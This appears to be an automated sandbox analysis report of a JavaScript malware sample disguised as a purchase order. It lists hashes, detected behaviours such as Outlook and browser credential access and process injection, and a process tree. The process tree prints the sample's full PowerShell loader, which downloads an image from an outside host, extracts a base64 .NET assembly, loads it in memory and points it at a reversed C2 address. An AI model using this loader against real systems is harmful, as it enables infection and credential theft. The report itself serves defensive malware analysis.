Analysis
-
max time kernel
61s -
max time network
141s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-03-2024 07:59
Static task
static1
Behavioral task
behavioral1
Sample
PURCHASE_ORDER.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
PURCHASE_ORDER.js
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
PURCHASE_ORDER.js
Resource
win11-20240221-en
General
-
Target
PURCHASE_ORDER.js
-
Size
16KB
-
MD5
5173d26d1ad641d21a4e46578c8ce893
-
SHA1
93fa6b081e5ef1b262b2497be0ec7ec8be766c20
-
SHA256
e8c22513e962d944212a2570a29a43fd2e6e90d74913f5db2b5f11443504db1d
-
SHA512
8df3b7d0c5b41675eaae029688c1cf964d58b66c558e16a528d143c3559d60dfcf4da5c44cb7b112a9123e7dc49e460e99cf862f6b743e1691804f78b89b349c
-
SSDEEP
192:P42HOwZ0qshWZ7Va6uadY7Va630PpMx2GjdJZu8HheVkiVUT:P42HO+0ApuPEP+28M8HheWz
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 2 4492 wscript.exe 3 4492 wscript.exe 5 4492 wscript.exe 6 2376 powershell.exe 7 2376 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 4 icanhazip.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2376 set thread context of 2228 2376 powershell.exe 79 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2376 powershell.exe 2376 powershell.exe 2228 RegAsm.exe 2228 RegAsm.exe 2228 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 2228 RegAsm.exe Token: SeSecurityPrivilege 1360 msiexec.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4492 wrote to memory of 2376 4492 wscript.exe 77 PID 4492 wrote to memory of 2376 4492 wscript.exe 77 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2376 wrote to memory of 2228 2376 powershell.exe 79 PID 2228 wrote to memory of 2868 2228 RegAsm.exe 81 PID 2228 wrote to memory of 2868 2228 RegAsm.exe 81 PID 2228 wrote to memory of 2868 2228 RegAsm.exe 81 PID 2868 wrote to memory of 1192 2868 cmd.exe 84 PID 2868 wrote to memory of 1192 2868 cmd.exe 84 PID 2868 wrote to memory of 1192 2868 cmd.exe 84 PID 2868 wrote to memory of 4352 2868 cmd.exe 85 PID 2868 wrote to memory of 4352 2868 cmd.exe 85 PID 2868 wrote to memory of 4352 2868 cmd.exe 85 PID 2868 wrote to memory of 4524 2868 cmd.exe 86 PID 2868 wrote to memory of 4524 2868 cmd.exe 86 PID 2868 wrote to memory of 4524 2868 cmd.exe 86 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PURCHASE_ORDER.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/731/991/original/new_image.jpg?1707144482', 'https://uploaddeimagens.com.br/images/004/731/991/original/new_image.jpg?1707144482'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4848/541.93.321.39//:ptth' , 'desativado' , 'C:\Windows\Temp\' , 'File_Name_JS'))}}2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2228 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:1192
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵PID:4352
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵PID:4524
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82